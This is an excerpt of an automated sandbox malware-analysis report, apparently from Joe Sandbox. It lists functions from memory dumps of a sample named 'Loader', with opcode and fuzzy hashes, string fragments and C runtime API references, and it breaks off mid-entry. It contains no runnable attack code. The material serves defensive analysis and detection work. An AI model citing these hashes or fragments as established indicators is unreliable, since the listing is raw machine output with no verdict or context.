                                                                            • Opcode ID: 0cfa06287c729573f0fa1a2144b268d937de13fabdac116ac4e1ee5acee0f7c2
                                                                            • Instruction ID: 41c524f712ec3e79fac7c4dbed0a62b43dc28340fbe7655ed5eb3b37757faa7a
                                                                            • Opcode Fuzzy Hash: 0cfa06287c729573f0fa1a2144b268d937de13fabdac116ac4e1ee5acee0f7c2
                                                                            • Instruction Fuzzy Hash: 5F210D36B146714FE3448F65DCD026673A3FFC6224F0A8234EEA6973E5C670E811C645
                                                                            Function 6E549ED0 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
                                                                            • Instruction ID: c6bdc6ccd6abd961d55a018daa39e0ec40a5fd05db6700278fa284d6ccbf2e5d
                                                                            • Opcode Fuzzy Hash: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
                                                                            • Instruction Fuzzy Hash: A21123B5A193909FD784DF25D99152BBAF8EB86308F889C2CE492E7350D734C502CF06
                                                                            Function 6E534E60 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
                                                                            • Instruction ID: f7ed19a28ee7b7d0966d9735e8c931ffdf5f0efceecbd49ecbd6beea2d9c3980
                                                                            • Opcode Fuzzy Hash: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
                                                                            • Instruction Fuzzy Hash: EA019EB18193449BD2449FA5C4A571BFBE4AB82314F505D2CF1D687290D7798505CF52
                                                                            Function 6E527A3E Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8ef43b0e05eaa2cb8996145f05dbaa100814a2fd4d2f81312e9ed4969d081c83
                                                                            • Instruction ID: db603db883a2e6d5eb8cb6e034893181da36b3f1de5689bd6f9a09e8ec6ca9b9
                                                                            • Opcode Fuzzy Hash: 8ef43b0e05eaa2cb8996145f05dbaa100814a2fd4d2f81312e9ed4969d081c83
                                                                            • Instruction Fuzzy Hash: 33B011A8E0820082A0008F20A8008FAE2BC8A0F00CF003820C20AA3203E322EA08828E
                                                                            Function 6E522D07 Relevance: 36.4, Strings: 29, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$"$#$%$($+$.$/$8$;$<$=$a$c$e$e$g$i$k$m$o$s$t$u$w$x$y${$}
                                                                            • API String ID: 0-665085891
                                                                            • Opcode ID: d49e0deb952383cce28578a3653d6de89ca5845d130c1f711584ab1759b6aa34
                                                                            • Instruction ID: 8a6b5d61ec0289cdea00908ddc3b0eed02fcc1c0fb587913886a7345f375686e
                                                                            • Opcode Fuzzy Hash: d49e0deb952383cce28578a3653d6de89ca5845d130c1f711584ab1759b6aa34
                                                                            • Instruction Fuzzy Hash: 8D913B2160CBC18AE336863C844839FBED11BE7224F098F9DE5E94B3D6C6B98445C767
                                                                            Function 6E525C55 Relevance: 36.4, Strings: 29, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$"$#$%$($+$.$/$8$;$<$=$a$c$e$e$g$i$k$m$o$s$t$u$w$x$y${$}
                                                                            • API String ID: 0-665085891
                                                                            • Opcode ID: a43a93e6f011965443b61dbedbe7747b18c2c2aba1a84f7b1b6c23020b45f27e
                                                                            • Instruction ID: b222e25efa72ec0dac5e6bf477252032725248b5a94b94a5523fc67c64147db2
                                                                            • Opcode Fuzzy Hash: a43a93e6f011965443b61dbedbe7747b18c2c2aba1a84f7b1b6c23020b45f27e
                                                                            • Instruction Fuzzy Hash: FD813D2151CBC18DE336863C844835ABED11BE7324F184FADE5E98B3D6C6B98546C763
                                                                            Function 6E5237E3 Relevance: 30.1, Strings: 24, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %$($+$-$.$/$/$/$3$4$6$:$;$A$J$L$O$X$X$[$\$]$e$~
                                                                            • API String ID: 0-2442427157
                                                                            • Opcode ID: 26ce1e4511ddc40be6b3e9ce31a401707789bd5e524813312b9e9841b9288bf6
                                                                            • Instruction ID: 43cc2a498c3688d5c99ab62d28be49a00f844bdbdbc2d159867374c8488c0c23
                                                                            • Opcode Fuzzy Hash: 26ce1e4511ddc40be6b3e9ce31a401707789bd5e524813312b9e9841b9288bf6
                                                                            • Instruction Fuzzy Hash: 0561E42050CBC189E3329B7C984C78BBED15BE6224F484F9DE1E84B3D2C77545468767
                                                                            Function 6E545820 Relevance: 25.2, Strings: 20, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $D$,D$4D$<D$DD$LD$TD$TD$\D$\D$dD$dD$lD$lD$tD$tD$|D$|D$D$D
                                                                            • API String ID: 0-1343015416
                                                                            • Opcode ID: ffbf46c5448f86090d7c31a2251d10b5cdea94c9c04753fc7ce7baba14decfcf
                                                                            • Instruction ID: 0f4a317b66275112db4f6b66a6d382a5bd7fef4b69cfd172a4acfaf2d384e717
                                                                            • Opcode Fuzzy Hash: ffbf46c5448f86090d7c31a2251d10b5cdea94c9c04753fc7ce7baba14decfcf
                                                                            • Instruction Fuzzy Hash: 5FC1F6B095A3C18BE770AF02C5487EBBAE4BFC5308F54891E91A81A345C7B90148DF9B
                                                                            Function 6E52EF30 Relevance: 22.6, Strings: 18, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$!@$#$&$&$($,$-$.$1$1$5$5$6$6$7$9$:
                                                                            • API String ID: 0-365062771
                                                                            • Opcode ID: 470f9ac1143cb14bb3dfe00f50bbe8b7e7812a675e9088dee4b51197d5e8b11f
                                                                            • Instruction ID: fc4be2607ebacf4150556d7e49cd6364ea15cd94f414fcc8fb9b57d26f53bf24
                                                                            • Opcode Fuzzy Hash: 470f9ac1143cb14bb3dfe00f50bbe8b7e7812a675e9088dee4b51197d5e8b11f
                                                                            • Instruction Fuzzy Hash: B081D2B000E7899AE371CF21C55C7DBBAE4FB85348F50890E86D81A754CBB99149DFCA
                                                                            Function 6E53F610 Relevance: 15.1, Strings: 12, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I$K$L$N$V$V$X$Y$Y$]$_$q
                                                                            • API String ID: 0-2073889574
                                                                            • Opcode ID: 508dcf0ab84d9945c61d6204bcccc03ab3e58d021f3621e2796ab83611b33502
                                                                            • Instruction ID: 8cc431dbca87f8ca108366c25efb30d49b29afc88217ca9a07fa6b5269fdba92
                                                                            • Opcode Fuzzy Hash: 508dcf0ab84d9945c61d6204bcccc03ab3e58d021f3621e2796ab83611b33502
                                                                            • Instruction Fuzzy Hash: AB416D7150C791CFE340EFB8D58839FBFE0AB92318F254C2DD5C986292E6B985488767
                                                                            Function 6E519D70 Relevance: 15.1, Strings: 12, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,q's$?u>w$@=E?$Q!R#$S)J+$Z-^/$x%F'$A"C$EG$IK$U?W$Y[
                                                                            • API String ID: 0-4103194446
                                                                            • Opcode ID: 573368589da63e6c59b33154dee8c7440ffcd4a98d8eca67f839d921efb52f65
                                                                            • Instruction ID: 3f02b1fde51ed4dca5b5886b93bcccf5c03f96d3be47424ae19f7cce059a867b
                                                                            • Opcode Fuzzy Hash: 573368589da63e6c59b33154dee8c7440ffcd4a98d8eca67f839d921efb52f65
                                                                            • Instruction Fuzzy Hash: 3351FCB4548385EBE3349F51D981B8BBAA0BB92744F518E1CD6E82B315D7B08045CF9A
                                                                            Function 6E528120 Relevance: 12.7, Strings: 10, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8W?I$A+i-$C;D=$E3C5$L#]%$^/i!$r7B)${?R1$su${}
                                                                            • API String ID: 0-1480604604
                                                                            • Opcode ID: 90427a17978d7f6236a27ed06e232c9036be19183bc773367f02727d9f4fa3b9
                                                                            • Instruction ID: 53c34025ee623497fcdd4dcf53da3e29c61f31b6cc2f0a34bbc47c1a5c7d82f0
                                                                            • Opcode Fuzzy Hash: 90427a17978d7f6236a27ed06e232c9036be19183bc773367f02727d9f4fa3b9
                                                                            • Instruction Fuzzy Hash: 2C7111B19083808BD3348F6584923DBBBF1EF96318F148A2DD5D84B2A5D7B489858F83
                                                                            Function 6E522B17 Relevance: 12.6, Strings: 10, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$$$q$s$u$w$x$y${$}
                                                                            • API String ID: 0-3743081959
                                                                            • Opcode ID: 04d403ee78875496e9eea4a3f2d4781e3b4e6ee94b7c0229ae0b042217dd2cae
                                                                            • Instruction ID: 281f4f67ccf6b425ae4a5f76af8e14ead2febb3251209092097cce3f7c3d0d59
                                                                            • Opcode Fuzzy Hash: 04d403ee78875496e9eea4a3f2d4781e3b4e6ee94b7c0229ae0b042217dd2cae
                                                                            • Instruction Fuzzy Hash: 0241593161C7C08ED3388A7884553DBBAD2AFD6328F094A6DD5DD4B3D2C7B948448753
                                                                            Function 6E522692 Relevance: 12.6, Strings: 10, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$$$q$s$u$w$x$y${$}
                                                                            • API String ID: 0-3743081959
                                                                            • Opcode ID: ff44a72933bf03427955208b0c1cda0334b5d4df1c63053f90a6e7e71531d6b2
                                                                            • Instruction ID: f4bb75267c3dc1e16c53be1602745c5af7ef34d626b6d85c9cfd8d51916d3bed
                                                                            • Opcode Fuzzy Hash: ff44a72933bf03427955208b0c1cda0334b5d4df1c63053f90a6e7e71531d6b2
                                                                            • Instruction Fuzzy Hash: 11416C21A1C7C08ED335866888583DBBED25FE2328F0D8AACD5DD0B3E2C7B954458353
                                                                            Function 6E4F9EEA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6E4FA009
                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 6E4FA117
                                                                            • _UnwindNestedFrames.LIBCMT ref: 6E4FA269
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6E4FA284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                            • String ID: csm$csm$csm
                                                                            • API String ID: 2751267872-393685449
                                                                            • Opcode ID: fee9dfc712402d3dcd278118155b98ddaa8f85ed576bd569302facdf702b6c43
                                                                            • Instruction ID: f4c23d7b545e03b9dcaee05399268a7183e13fed5bcfc9c7de243c949453ef1f
                                                                            • Opcode Fuzzy Hash: fee9dfc712402d3dcd278118155b98ddaa8f85ed576bd569302facdf702b6c43
                                                                            • Instruction Fuzzy Hash: E7B1437190020AEFCF05CFF4D980D9EB7B9EF84B15B11495AE8106B315D732EA52DBA2
                                                                            Function 6E4F8F90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6E4F8FC7
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6E4F8FCF
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6E4F9058
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6E4F9083
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6E4F90D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: d498cc1843472f744b9adae4f13ad2d0135e8a98a1c20bae2e101c080bb2dfeb
                                                                            • Instruction ID: 075649e0064dc8159b26426d3f9e58640743fe132432734befb5f2103f36b903
                                                                            • Opcode Fuzzy Hash: d498cc1843472f744b9adae4f13ad2d0135e8a98a1c20bae2e101c080bb2dfeb
                                                                            • Instruction Fuzzy Hash: 9C415034A00149DFCF00CFEAC884E9E7BA9AF85718F14855AEA14AB355D732A916CF91
                                                                            Function 6E4FDE5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00000000,?,6E4FDF6C,00000000,6E4FB770,00000000,00000000,00000001,?,6E4FE0E6,00000022,FlsSetValue,6E505688,6E505690,00000000), ref: 6E4FDF1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: api-ms-$ext-ms-
                                                                            • API String ID: 3664257935-537541572
                                                                            • Opcode ID: 42ee65654371b008de6a4a4def50f75b1b4d650669d4c8a323c32c0f2f0be503
                                                                            • Instruction ID: b5cfee642823e7b15761a397220f1095aa2d30406a0837078e4e9d8691214e7e
                                                                            • Opcode Fuzzy Hash: 42ee65654371b008de6a4a4def50f75b1b4d650669d4c8a323c32c0f2f0be503
                                                                            • Instruction Fuzzy Hash: B521C336905911EBDB118BB58C64F4B37A9DBD3B64B120126F911AB380DB30EE03CEE0
                                                                            Function 6E523D6E Relevance: 10.1, Strings: 8, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$4$5$5$:$:$;$;
                                                                            • API String ID: 0-2736053740
                                                                            • Opcode ID: b12d8d019e17c04f5cb6ae8458d99f7e5145083ce2e65e4e603cb09dfc062c39
                                                                            • Instruction ID: 692666e91c3bfea8a5686bb1a83c8b51ebc3bcf295f51ca5643fe159b4d53f5b
                                                                            • Opcode Fuzzy Hash: b12d8d019e17c04f5cb6ae8458d99f7e5145083ce2e65e4e603cb09dfc062c39
                                                                            • Instruction Fuzzy Hash: B851017660C3828FD324CBA8C89839ABBE26BD6354F198D3ED5D8573C1C7789844CB42
                                                                            Function 6E525845 Relevance: 10.1, Strings: 8, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$4$5$5$:$:$;$;
                                                                            • API String ID: 0-2736053740
                                                                            • Opcode ID: c747241c27af526782d491eb025e49fdb9dabb3bdf265b19d2e97867d677c49d
                                                                            • Instruction ID: dc6b5c7088486f4636ab894eaf63bf158846dd0282721740a026ae09d9a0e646
                                                                            • Opcode Fuzzy Hash: c747241c27af526782d491eb025e49fdb9dabb3bdf265b19d2e97867d677c49d
                                                                            • Instruction Fuzzy Hash: 4751023265C3818FD324CBA8C8907AA7BE26BC6354F19897EC4D8973C1CB789840C743
                                                                            Function 6E5228DF Relevance: 10.1, Strings: 8, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$4$5$5$:$:$;$;
                                                                            • API String ID: 0-2736053740
                                                                            • Opcode ID: 149e46bba9adf0c87ecc231f3d17da9b5d0843504ffbca05c66cc5bd46323692
                                                                            • Instruction ID: 6810953a2838abd43f5118954b94da4050d593dadfa12796bb0e0a53078d362c
                                                                            • Opcode Fuzzy Hash: 149e46bba9adf0c87ecc231f3d17da9b5d0843504ffbca05c66cc5bd46323692
                                                                            • Instruction Fuzzy Hash: 3351F07E51D3C18FE325CBA8C89079A7BE16B86354F198E7DC5D8572C2C7B89840CB42
                                                                            Function 6E51A530 Relevance: 10.1, Strings: 8, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =i<o$J!G'$K=C#$U`3$`1d7$d5h;${){/${-S
                                                                            • API String ID: 0-1055848192
                                                                            • Opcode ID: 4330c83bd3902cee50c249b837b8d5e177b015b7eb770b91e5233411d865ff69
                                                                            • Instruction ID: f73e7fe1c215ec635017ceacaccf724b009de8d86596f5e0d927346804c09655
                                                                            • Opcode Fuzzy Hash: 4330c83bd3902cee50c249b837b8d5e177b015b7eb770b91e5233411d865ff69
                                                                            • Instruction Fuzzy Hash: DD51C8B000D7809BE2709F11E881B9FBBF5BBD2784F208E1CD2E91A255E7758046CF92
                                                                            Function 6E527CB8 Relevance: 10.1, Strings: 8, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ";7>$&> &$));*$,#15$2821$5:',$d$z,>9
                                                                            • API String ID: 0-3050492773
                                                                            • Opcode ID: 96a8b58cc2d615ff36c6967098bc0e4b08fdb69918352712e2d3b66006053e0b
                                                                            • Instruction ID: ccccc87675de3645b57e18d3efdfc8d846ad3be5a7c0a0e5795f2e4bad4b5f95
                                                                            • Opcode Fuzzy Hash: 96a8b58cc2d615ff36c6967098bc0e4b08fdb69918352712e2d3b66006053e0b
                                                                            • Instruction Fuzzy Hash: 473137B844C3848BD3798F61D8917DFBFE0EB96704F109E1CD2C98A241C7B8055A8B97
                                                                            Function 6E4F953C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000001,?,6E4F9171,6E4F8270,6E4F7C89,?,6E4F7EC1,?,00000001,?,?,00000001,?,6E509498,0000000C,6E4F7FBA), ref: 6E4F954A
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4F9558
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4F9571
                                                                            • SetLastError.KERNEL32(00000000,6E4F7EC1,?,00000001,?,?,00000001,?,6E509498,0000000C,6E4F7FBA,?,00000001,?), ref: 6E4F95C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 09d1fc1e2c10cc6998b054ac231a795bfff59ae782f3c176d7a19c9610258791
                                                                            • Instruction ID: 6fa69661851bb40e454b1bffb49710a113c3d86d76e98d66a1abb5657a3cc44e
                                                                            • Opcode Fuzzy Hash: 09d1fc1e2c10cc6998b054ac231a795bfff59ae782f3c176d7a19c9610258791
                                                                            • Instruction Fuzzy Hash: 0101B53321D615EEAA451DF99D94D863798DB83F7A721022FF720992D0EF538843C684
                                                                            Function 6E51970C Relevance: 8.9, Strings: 7, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
